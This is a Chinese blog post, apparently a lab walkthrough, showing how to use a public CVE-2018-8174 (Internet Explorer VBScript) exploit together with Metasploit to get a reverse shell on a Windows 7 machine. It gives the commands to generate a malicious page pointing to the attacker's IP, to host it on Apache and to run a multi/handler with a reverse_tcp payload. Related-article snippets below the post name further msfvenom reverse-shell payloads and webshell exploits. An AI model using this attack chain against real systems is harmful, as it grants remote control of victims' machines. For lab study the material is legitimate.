msf利用0DAY漏洞获取shell

最新推荐文章于 2024-05-27 18:31:29 发布
最新推荐文章于 2024-05-27 18:31:29 发布
阅读量702 收藏 3
点赞数
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Deeeelete/article/details/104458835
版权

安装CVE-2018-8174_EXP

 git clone https://github.com/iBearcat/CVE-2018-8174_EXP .git

在这里插入图片描述
然后发现没克隆下来,所以这里我直接用xshell上传了zip包并解压在本目录
进入我们的文件目录
cd CVE-2018-8174_EXP-master/
在这里插入图片描述
生成恶意html文件

python CVE-2018-8174.py -u http://192.168.132.144/exploit.html -o hack.rtf -i 192.168.132.144 -p 4444

在这里插入图片描述

将文件移动到apache根目录

 mv exploit.html /var/www/html

在这里插入图片描述
开一下apache服务

service apache2 start

在这里插入图片描述
Ctrl+shift+t重新开一个页面开启监听

msfconsole
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.132.144
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > run

在这里插入图片描述

于是我们去win7访问
在这里插入图片描述
但是可能是连接不稳定的问题,这里我一旦访问这个网址浏览器就崩掉,所以这里断了好几次才成功
在这里插入图片描述
whoami命令打错了。。。chcp 65001解决一下乱码
在这里插入图片描述
当然,如果在物理机上尝试,就会被杀毒软件捕捉到

Deeeelete
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Kali利用0DAY漏洞CVE-2018-8174获取shell权限
weixin_43894771的博客
03-10 1970
*0day一把怎样的武器 0day漏洞,又称“零日漏洞”(zero-day),是已经被发现(有可能未被公开),而官方还没有相关补丁的漏洞。通俗地讲就是,除了漏洞发现者,没有其他的人知道这个漏洞的存在,并且可以有效地加以利用,发起的攻击往往具有很大的突发性与破坏性。*
msfvenom获取shell
01-03
仅用于测试 msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p ...msfvenom -a x86 –platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.ma
office漏洞利用--获取shell
dianyan5615的博客
12-11 107
  环境:   kali系统, windows系统   流程:   在kali系统生成利用文件, kali系统下监听本地端口, windows系统打开doc文件,即可中招      第一种利用方式, 适合测试用:     从git下载代码: git clone https://github.com/Ridter/CVE-2017-11882     执行以下代码,...
msfconsole之制作windows木马并成功获取shell(正向payload)
最新发布
2201_75387456的博客
05-27 770
还有⽐如 有⼀种情 况,⽬标处于深层⽹络,不能直接连通外⽹,也不能通过其他机器连通,因 为其他机器 防⽕墙都开着,为避免在有防⽕墙监控的情况下关闭防⽕墙⽽被发现,也只能⽤正向的⻢,然后通过开着防⽕墙的机器来进⾏端⼝的转发达到穿透的⽬的。set payload windows/x64/meterpreter/bind_tcp //生成exe时相同的协议。端⼝启⽤监听后,只会接收⼀次数据,⽆论成功或者失败,它 都不会再监听了!将生成的文件在靶机中打开,利用netstat -ano查看打开的端口。
利用XP ie浏览器的漏洞获取shell
weixin_44195546的博客
03-12 3387
实验环境:kali linux、windows XP Professional SP3. 实验工具:metasploit framework 功能实现模块:use exploit/windows/brower/ms14_064_ole_code_execution 实验过程: 1.执行模块,查看参数配置,并且设置payload(set payload windows/meterpreter/reverse_tcp): 2.其他参数无需再配置,直接run就行。(如果端口LPORT被占用了,可以用
已遭利用的Windows 0day漏洞 CVE-2020-1380 分析
weixin_46236101的博客
10-14 1741
卡巴斯基发布博客文章,简要分析了微软在8月补丁星期二修复的一个已遭利用 0day CVE-2020-1380。如下内容编译自该文章。 文章指出,2020年5月,卡巴斯基阻止了利用 IE 恶意脚本攻击某韩国公司的一次攻击活动。进一步分析发现该攻击利用了此前未知的完整链,内含两个0day exploit:一个是IE 的远程代码执行 exploit,一个是 Windows 的提权 exploit。和此前 OperationWizardOpium 攻击使用的完整链不同,这个新的完整链利用的是 Windows 10的
Oday,简单拿webshell
weixin_34417814的博客
03-30 144
关键字:inurl:urlProblem.asp 谷歌一下~ 找个站打开 然后 替换存在漏洞 的文件 /admin/include/upload_form.asp 把这个文件urlProblem.asp 替换成 上面的漏洞地址。 enter~ 然后传马吧~ 转载于:https://blog.51cto.com/smasher/289517...
K8飞刀--Hacking Team Flash 0day漏洞利用.ppt
07-21
攻击者可以利用Metasploit(MSF)框架生成所需shellcode,并将其转换为适用于Flash 0day漏洞的bytearray格式。 4. **源码修改**:为了构建有效的漏洞利用工具,攻击者需要修改Hacking Team的源码,将生成的...
MySQL数据库渗透及漏洞利用总结
02-20
各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但...
CVE-2018-2883漏洞利用程序msf
03-27
针对CVE-2018-2883漏洞,Metasploit社区已经开发了一个专门的利用模块,即“msf”模块。通过这个模块,用户可以轻松地对目标系统进行漏洞扫描和利用。具体步骤如下: 1. **配置Metasploit**: 首先确保安装了最新...
利用phpcms v9 0dayshell+提权.wps
12-31
此Oday非同寻常,速度下载吧黑友们!一天几个站没问题!
价值500元拿webshell0day.rar
08-01
拿webshell0day,工具加一些文档,,很好用的工具 分享给大家,大家可以看看
msf攻击FTP 服务.docx
04-26
通过图文并茂的方式详细描述了利用msf框架进行ftp攻击的过程,文中包含了命令和步骤,很详细,给初学者作为参考。
msf利用jre-7u17-windows-i586漏洞获取shell
Deeeelete的博客
02-24 1034
首先要在win7安装java环境,版本是jre-7u17-windows-i586 百度云链接:https://pan.baidu.com/s/1UOuBZcCKbBcrJM7qzIw_nQ 提取码:ociq 安装期间先去msf开启模块 use exploit/multi/browser/java_jre17_driver_manager set payload java/meterpret...
[送0day]代码审计就该这么来3 beescms getshell
qianduan520的博客
10-26 773
前言 上一回(http://bbs.ichunqiu.com/thread-13714-1-1.html)说到快速漏洞挖掘中的几个重点关注对象,命令执行,文件操作,sql注入。并且拿sql做为例子简单做了一次代码审计,今天换一个思路,从文件操作部分入手,毕竟 文件操作一个搞不好就是getshell,比起注入按部就班慢慢来可要爽快多了。一、关注重点 对于文件操作部分来说,首先对php内置的文件...
渗透测试实战:利用漏洞提权(一)
qq_42242380的博客
10-14 1142
在一系列的渗透测试中,我们主要是使用了kali Linux作为攻击端,使用Windows xp作为靶机。话不多说,现在开始实践。 这次我们利用IE浏览器上的漏洞来对Windows xp进行提权(只要是为了拿到shell),本次利用漏洞为:ms10-002,是IE的一个经典漏洞(也被称为“极光”漏洞)。 1.我们先在kali Linux中打开msf,在框架下搜索ms10-002的漏洞利用模块并选择。...
0day 安全之 msf 初探
qq_41071646的博客
08-14 204
msf 这个工具 在我还没有开始学pwn 就有搞web的人 说过这个框架 只是没有怎么了解 没有想到这个工具 竟然使用Ruby 写的,, 社会 社会,。 然后这里 关于在 windows下的安装 我就不说了 反正 都一样(直接用kail的就行) 不过 有一点 感觉很坑 就是 版本不一样 然后 导致我们写的 exploit 可能会加载失败,,(可能是) 这里我也不太确定,因为我也不太...
最新IE 0day漏洞Metasploit生成方法
weixin_33766168的博客
06-27 138
一、下载http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb 二、放到C:\Metasploit\Framework3\msf3\modules\exploits\test。改个名字叫ie.rb 三、启动msfconsole 四、msf > use exploit/test/ie msf...
使用metasploit(MSF)对windows的ms08-067漏洞进行利用的过程
D-river博客
10-11 9492
metasploit比较经典的使用实例,ms08-067 netapi
如何利用msf进行漏洞扫描
05-12
使用Metasploit Framework(MSF)进行漏洞扫描可以帮助您发现系统中存在的漏洞并提供相应的解决方案。以下是使用MSF进行漏洞扫描的步骤: 1. 安装Metasploit Framework:您可以从官方网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deeeelete

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值